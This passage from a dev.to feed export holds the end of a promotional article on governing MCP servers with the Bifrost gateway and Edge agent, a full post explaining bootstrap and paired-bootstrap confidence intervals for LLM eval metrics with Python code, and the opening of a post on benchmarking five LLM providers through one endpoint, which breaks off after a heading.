&lt;li&gt;  &lt;strong&gt;Approve or Deny MCP Servers:&lt;/strong&gt; After discovery, each unique MCP server found across the fleet appears in a catalog. Administrators can then make explicit per-server allow or deny decisions. A denied server cannot be used, even if an AI application on an endpoint was previously configured to connect to it.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Govern AI Applications:&lt;/strong&gt; Beyond individual MCP servers, administrators can also define which AI applications themselves are permitted for use on company machines. Edge enforces these policies, ensuring only sanctioned applications can operate.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Apply Policies via Virtual Keys:&lt;/strong&gt; Bifrost's &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;virtual keys&lt;/a&gt; allow administrators to assign specific MCP tool filtering policies to different projects, teams, or individual users. With this fine-grained control, developers, for example, can have access to a different set of tools than a customer support team.&lt;/li&gt;
&lt;/ul&gt;
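&lt;p&gt;The per-server approve/deny step can be pictured as a lookup against a decision table. This Python sketch is illustrative only: the table, the status strings, and the choice to treat undecided servers as blocked are assumptions, not Bifrost's data model or documented default.&lt;/p&gt;

```python
# Hypothetical decision table; the statuses and server identities are illustrative.
DECISIONS = {
    "https://mcp.example.com/sse": "allow",
    "https://untrusted.example.net/mcp": "deny",
}


def evaluate(server, decisions):
    """Return the recorded decision, or "pending" when no admin has decided yet."""
    return decisions.get(server, "pending")


def is_permitted(server, decisions):
    """Permit only explicitly allowed servers (a default-deny assumption of this sketch)."""
    return evaluate(server, decisions) == "allow"


for server in [
    "https://mcp.example.com/sse",
    "https://untrusted.example.net/mcp",
    "https://new.example.org/mcp",
]:
    print(server, evaluate(server, DECISIONS), is_permitted(server, DECISIONS))
```

&lt;p&gt;Keeping "pending" distinct from "deny" lets a console show which servers still need a decision while traffic to them stays blocked.&lt;/p&gt;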

&lt;p&gt;The decisions made in the central Bifrost console are automatically synchronized to every Bifrost Edge agent. This ensures that policy updates take effect across the entire organization without requiring manual configuration on individual devices.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcg19xa1e75oh7q1nf1j1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcg19xa1e75oh7q1nf1j1.png" alt="A stylized visual metaphor of a central control tower (representing the Bifrost gateway) sending out green light beams (" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Enhancing Security and Compliance with Guardrails and Audit Logs
&lt;/h2&gt;

&lt;p&gt;Controlling which MCP servers are used is crucial, but equally important is governing the content and actions flowing through them. Bifrost extends its powerful &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;guardrail capabilities&lt;/a&gt; to endpoint AI traffic, ensuring comprehensive security and compliance.&lt;/p&gt;

&lt;p&gt;Guardrails are applied before a prompt reaches an MCP server and before its response is returned to the AI agent. This allows organizations to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Detect Secrets:&lt;/strong&gt; Automatically identify and block sensitive information, such as API keys, credentials, or tokens, from being sent in prompts or extracted from responses. Bifrost includes native &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails/secrets-detection" rel="noopener noreferrer"&gt;secrets detection&lt;/a&gt; powered by Gitleaks.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Enforce Custom Content Policies:&lt;/strong&gt; Implement &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails/custom-regex" rel="noopener noreferrer"&gt;custom regex rules&lt;/a&gt; to prevent the transmission of specific types of PII, proprietary code, or other sensitive data unique to the organization.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Integrate Third-Party Content Safety:&lt;/strong&gt; Leverage existing investments in security tools like AWS Bedrock Guardrails, Azure Content Safety, CrowdStrike AIDR, GraySwan Cygnal, and Patronus AI, with their policies applying to MCP traffic as well.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Furthermore, all MCP server interactions governed by Bifrost Edge are captured in immutable &lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;audit logs&lt;/a&gt;. These logs provide a comprehensive, tamper-proof record of AI usage, which is essential for demonstrating compliance with regulatory requirements like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/p&gt;

&lt;h2&gt;
  
  
  Streamlined Deployment with MDM for Fleet-Wide Governance
&lt;/h2&gt;

&lt;p&gt;Deploying endpoint agents across an entire enterprise fleet can be a significant operational challenge. Bifrost Edge is designed for mass deployment through existing Mobile Device Management (MDM) platforms. This eliminates the need for manual installation or complex user-driven setup, ensuring consistent rollout and compliance.&lt;/p&gt;

&lt;p&gt;Bifrost Edge supports major MDM platforms including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud across macOS, Windows, and Linux devices. Administrators can push the Edge agent to every machine with a managed configuration that pre-points it to the organization's Bifrost AI gateway. The first-launch flow is streamlined: silent installation, a single user sign-in via SSO in the browser to link the device to the user, and then immediate policy enforcement.&lt;/p&gt;

&lt;p&gt;This MDM-native deployment ensures that AI governance, including MCP server control, is rolled out consistently and automatically to every managed endpoint, closing shadow AI gaps efficiently.&lt;/p&gt;

&lt;h2&gt;
  
  
  The AI Gateway + Bifrost Edge Approach for Comprehensive MCP Control
&lt;/h2&gt;

&lt;p&gt;Controlling Model Context Protocol servers in an enterprise environment requires a multi-layered strategy that combines centralized policy management with endpoint enforcement. The Bifrost AI gateway serves as the control plane and policy engine, where all governance rules for AI traffic are defined. Bifrost Edge extends this same governance to every endpoint, ensuring that the AI agents and tools employees use on their machines adhere to organizational policies.&lt;/p&gt;

&lt;p&gt;This combined "AI Gateway + Bifrost Edge" approach provides unparalleled visibility into MCP server usage, granular control over permitted tools and applications, and robust security and compliance through integrated guardrails and audit logs. For organizations seeking to fully govern their AI landscape, this integrated solution provides a clear path to managing the risks and unlocking the full potential of agentic AI. Teams evaluating AI gateways can &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;request a Bifrost demo&lt;/a&gt; or review the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source repository&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  Bifrost Docs: Govern MCP servers (MCP governance). &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/mcp-governance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Admin Approvals. &lt;a href="https://docs.getbifrost.ai/edge/admin-approvals" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/admin-approvals&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Govern AI apps (app governance). &lt;a href="https://docs.getbifrost.ai/edge/app-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/app-governance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Security &amp;amp; guardrails. &lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/security&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  Bifrost Docs: Deploy with MDM. &lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/deployment-mdm&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>enterprise</category>
      <category>security</category>
      <category>governance</category>
    </item>
    <item>
      <title>Bootstrap confidence intervals for your LLM eval metrics</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 06:32:50 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/bootstrap-confidence-intervals-for-your-llm-eval-metrics-3599</link>
      <guid>https://dev.to/marcuswwchen/bootstrap-confidence-intervals-for-your-llm-eval-metrics-3599</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; A single eval number hides its own uncertainty. Eval confidence intervals from bootstrap resampling turn a point estimate like 84.2% accuracy into a range, so you stop shipping models on a difference that is noise.&lt;/p&gt;

&lt;p&gt;Two checkpoints came back from a fine-tuning run at 84.2% and 85.7% on our 500-example agent eval set. The 1.5 point gap read like a win, and someone wanted to promote the second checkpoint to staging. Before that, I wanted eval confidence intervals on both numbers, because a 500-example set carries more sampling error than most teams admit. At 500 examples, the 95% interval on a single accuracy near 85% spans roughly 3 points on each side. The win sat well inside the noise.&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and evaluation team at Nexus Labs, and the most common mistake I see is treating an eval score as exact. It isn't. Your eval set is a sample drawn from the input space you care about, and a different 500 examples would return a different number. Confidence intervals make that variance visible.&lt;/p&gt;

&lt;h2&gt;
  
  
  What an eval confidence interval actually tells you
&lt;/h2&gt;

&lt;p&gt;An eval confidence interval is a range around a metric, like accuracy or F1, that quantifies how much the score would move if you resampled the eval set. A 95% bootstrap interval of [81.0%, 87.1%] means that across thousands of resamples of your data, 95% of the recomputed scores fell in that band. It measures sampling noise, not model quality.&lt;/p&gt;

&lt;p&gt;That distinction matters. Two checkpoints scoring 84.2% and 85.7% with heavily overlapping intervals have not been separated by your eval set. Whether the gap is real is a question for a paired test on the difference, not for eyeballing the overlap. The problem is common: Card et al. showed in &lt;a href="https://aclanthology.org/2020.emnlp-main.745/" rel="noopener noreferrer"&gt;"With Little Power Comes Great Responsibility"&lt;/a&gt; that many NLP experiments are underpowered to detect the effect sizes they report.&lt;/p&gt;

&lt;h2&gt;
  
  
  Computing bootstrap confidence intervals
&lt;/h2&gt;

&lt;p&gt;The bootstrap is resampling with replacement. You take your per-example results, draw N of them with replacement many times, recompute the metric each time, and read percentiles off the resulting distribution. There's no assumption that the metric is normally distributed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;numpy&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;

&lt;span class="c1"&gt;# per-example correctness, 1 = pass, 0 = fail
&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eval_pass_flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# shape (500,)
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;bootstrap_ci&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;10_000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.05&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;rng&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;default_rng&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;means&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;sample&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;rng&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;integers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
        &lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sample&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;lo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;hi&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;means&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;alpha&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;lo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;hi&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;bootstrap_ci&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# (0.842, 0.806, 0.876)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;SciPy ships &lt;code&gt;scipy.stats.bootstrap&lt;/code&gt; if you'd rather not hand-roll it. For 500 examples and 10,000 resamples this runs in under a second, so there's no cost excuse to skip it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Paired bootstrap for model comparisons
&lt;/h2&gt;

&lt;p&gt;When comparing two checkpoints, don't bootstrap each interval separately and check for overlap. Overlapping intervals can still hide a real difference. Use a paired bootstrap: resample the example indices once per iteration, score both models on the same indices, and record the difference.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;paired_bootstrap&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;10_000&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;rng&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;default_rng&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;diffs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n_boot&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;rng&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;integers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;diffs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;mean&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;percentile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;diffs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mf"&gt;2.5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;97.5&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that interval on the difference contains zero, you can't claim the second checkpoint is better. On our 1.5 point gap, the interval on the difference (second checkpoint minus first) ran from -1.9 to +4.8 points. Zero is in the band, so we did not promote. Dror et al.'s &lt;a href="https://aclanthology.org/P18-1128/" rel="noopener noreferrer"&gt;"Hitchhiker's Guide to Testing Statistical Significance in NLP"&lt;/a&gt; covers when paired tests apply and which to pick.&lt;/p&gt;

&lt;h2&gt;
  
  
  How many eval examples do you need
&lt;/h2&gt;

&lt;p&gt;Interval width shrinks in proportion to one over the square root of N, so halving it costs four times the labeled data. At 500 examples a near-85% metric carries about plus or minus 3 points; reaching plus or minus 1.5 needs roughly 2,000 labeled examples. That is the real budgeting question for an eval set, and it's why I push for fewer, higher-quality, well-stratified examples instead of chasing a round number.&lt;/p&gt;

&lt;p&gt;For rare failure modes the picture is worse. A category with 20 examples in your set has an interval so wide it tells you almost nothing, which is how aggregate scores stay stable while a subpopulation quietly regresses.&lt;/p&gt;
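&lt;p&gt;The figures in this section follow from the normal approximation to a binomial proportion, which is rougher than the bootstrap but good enough for budgeting. A minimal sketch, assuming a true pass rate near 85%; &lt;code&gt;half_width&lt;/code&gt; and &lt;code&gt;required_n&lt;/code&gt; are illustrative helper names, not part of any library:&lt;/p&gt;

```python
import math

Z_95 = 1.96  # two-sided 95% normal quantile


def half_width(p, n, z=Z_95):
    """Approximate CI half-width for a pass rate p measured on n examples."""
    return z * math.sqrt(p * (1 - p) / n)


def required_n(p, target, z=Z_95):
    """Smallest n whose approximate half-width is at or below target."""
    return math.ceil(z * z * p * (1 - p) / (target * target))


# Half-width in points for a 20-example slice, the 500-example set, and 2,000.
for n in (20, 500, 2000):
    print(n, round(100 * half_width(0.85, n), 1))

# Examples needed for plus or minus 1.5 points at an 85% pass rate.
print(required_n(0.85, 0.015))
```

&lt;p&gt;This prints about 15.6, 3.1, and 1.6 points for 20, 500, and 2,000 examples, and 2,177 examples to get under plus or minus 1.5 points. The 20-example slice is the one to worry about: a swing of 15 points either way is inside its noise.&lt;/p&gt;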

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;The bootstrap assumes your eval examples are independent and drawn from the distribution you care about. If they cluster (multiple turns from one conversation, or near-duplicate prompts), the effective sample size is smaller than N and your interval comes out too narrow. Dedup near-duplicates first, and treat the conversation, not the turn, as the unit you resample.&lt;/p&gt;
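&lt;p&gt;Dedup handles near-duplicate prompts but not turns that legitimately come from the same conversation. One common workaround is a cluster bootstrap, which resamples whole conversations instead of individual turns. It's a variation on the code earlier in this post, not something we've benchmarked here. A minimal sketch in standard-library Python, assuming each example carries a conversation ID; the function name and the synthetic data are illustrative:&lt;/p&gt;

```python
import random
from collections import defaultdict


def cluster_bootstrap_ci(flags, cluster_ids, n_boot=2000, alpha=0.05, seed=0):
    """Percentile CI for pass rate, resampling whole clusters with replacement."""
    groups = defaultdict(list)
    for flag, cid in zip(flags, cluster_ids):
        groups[cid].append(flag)
    clusters = list(groups.values())

    rng = random.Random(seed)
    stats = []
    for _ in range(n_boot):
        # Draw as many clusters as we have, keeping each cluster's turns together.
        drawn = rng.choices(clusters, k=len(clusters))
        total = sum(len(c) for c in drawn)
        stats.append(sum(sum(c) for c in drawn) / total)

    stats.sort()
    lo = stats[int(n_boot * alpha / 2)]
    hi = stats[int(n_boot * (1 - alpha / 2)) - 1]
    return lo, hi


# Synthetic worst case: 50 conversations of 4 turns, each all-pass or all-fail.
flags = [1, 1, 1, 1] * 40 + [0, 0, 0, 0] * 10   # 200 turns, 80% pass
cluster_ids = [i // 4 for i in range(200)]
lo, hi = cluster_bootstrap_ci(flags, cluster_ids)
print(round(lo, 3), round(hi, 3))
```

&lt;p&gt;In this synthetic case the turns inside a conversation are perfectly correlated, so the 200 turns behave like 50 independent examples and the interval comes out roughly twice as wide as a per-turn bootstrap would report.&lt;/p&gt;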

&lt;p&gt;It also only measures sampling noise. It says nothing about label error, distribution shift between your eval set and production traffic, or a judge model that's miscalibrated. A tight interval on a biased metric is still wrong, only now you're confident in it. For very low pass rates the percentile bootstrap can misbehave; bias-corrected and accelerated (BCa) intervals are better there but slower to compute.&lt;/p&gt;
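&lt;p&gt;For the BCa option, SciPy's &lt;code&gt;scipy.stats.bootstrap&lt;/code&gt; accepts &lt;code&gt;method="BCa"&lt;/code&gt;. A rough sketch, assuming NumPy and SciPy are installed; the 421-of-500 flags are synthetic, chosen only to reproduce an 84.2% pass rate:&lt;/p&gt;

```python
import numpy as np
from scipy.stats import bootstrap

# Synthetic per-example flags: 421 passes out of 500 (84.2%).
x = np.array([1] * 421 + [0] * 79)

# Data is passed as a one-element tuple; np.mean is the statistic.
res = bootstrap(
    (x,),
    np.mean,
    n_resamples=10_000,
    confidence_level=0.95,
    method="BCa",
)
ci = res.confidence_interval
print(x.mean(), ci.low, ci.high)
```

&lt;p&gt;The call is unseeded here, so the bounds shift slightly between runs. Swapping &lt;code&gt;method&lt;/code&gt; to &lt;code&gt;"percentile"&lt;/code&gt; gives the same kind of interval as the hand-rolled version above, which makes it easy to compare the two on a low-pass-rate slice.&lt;/p&gt;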

&lt;h2&gt;
  
  
  Wrapping up
&lt;/h2&gt;

&lt;p&gt;Eval confidence intervals are the cheapest reliability upgrade available to an ML team. A dozen lines of NumPy turns every score into a score plus a band, and the band is usually wider than the gap you were about to ship on. Next time a checkpoint wins by a point or two, run the paired bootstrap before you tell anyone. The honest answer is often "we can't tell yet, label more data."&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Card et al., &lt;a href="https://aclanthology.org/2020.emnlp-main.745/" rel="noopener noreferrer"&gt;"With Little Power Comes Great Responsibility"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Dror et al., &lt;a href="https://aclanthology.org/P18-1128/" rel="noopener noreferrer"&gt;"The Hitchhiker's Guide to Testing Statistical Significance in NLP"&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.bootstrap.html" rel="noopener noreferrer"&gt;scipy.stats.bootstrap documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
    </item>
    <item>
      <title>Benchmarking 5 LLM providers on one eval set, no SDK per vendor</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Tue, 23 Jun 2026 16:01:10 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/benchmarking-5-llm-providers-on-one-eval-set-no-sdk-per-vendor-2j6g</link>
      <guid>https://dev.to/marcuswwchen/benchmarking-5-llm-providers-on-one-eval-set-no-sdk-per-vendor-2j6g</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR: We run a 1,200-case eval suite for enterprise agent automation at Nexus Labs. Comparing models across OpenAI, Anthropic, Bedrock, Vertex, and Groq used to mean five client libraries and five sets of retry logic. We put Bifrost in front of all of them and now the harness talks to one OpenAI-compatible endpoint. Here's what that bought us, and where it didn't help.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem was never the models
&lt;/h2&gt;

&lt;p&gt;Our eval set is 1,200 cases. Tool-call traces, multi-turn agent transcripts, graded against a rubric. The grading is hard. The models are not the hard part.&lt;/p&gt;

&lt;p&gt;The hard part was the plumbing around the models. Every time we wanted to score a new candidate, the code branched. &lt;code&gt;openai.ChatCompletion&lt;/code&gt; for GPT-4o. &lt;code&gt;anthropic.messages&lt;/code&gt; for Claude. The &lt;code&gt;boto3&lt;/code&gt; Bedrock runtime for the Llama variants. Vertex had its own auth dance with service accounts. Groq was OpenAI-shaped but pointed at a different base URL with its own rate limits.&lt;/p&gt;

&lt;p&gt;Five providers. Five SDKs. Five retry policies, all written slightly differently by whoever added that provider. When a Vertex call 429'd at case 800 of a run, the harness handled it differently than when Anthropic did. So our results carried noise that had nothing to do with model quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  One endpoint, five backends
&lt;/h2&gt;

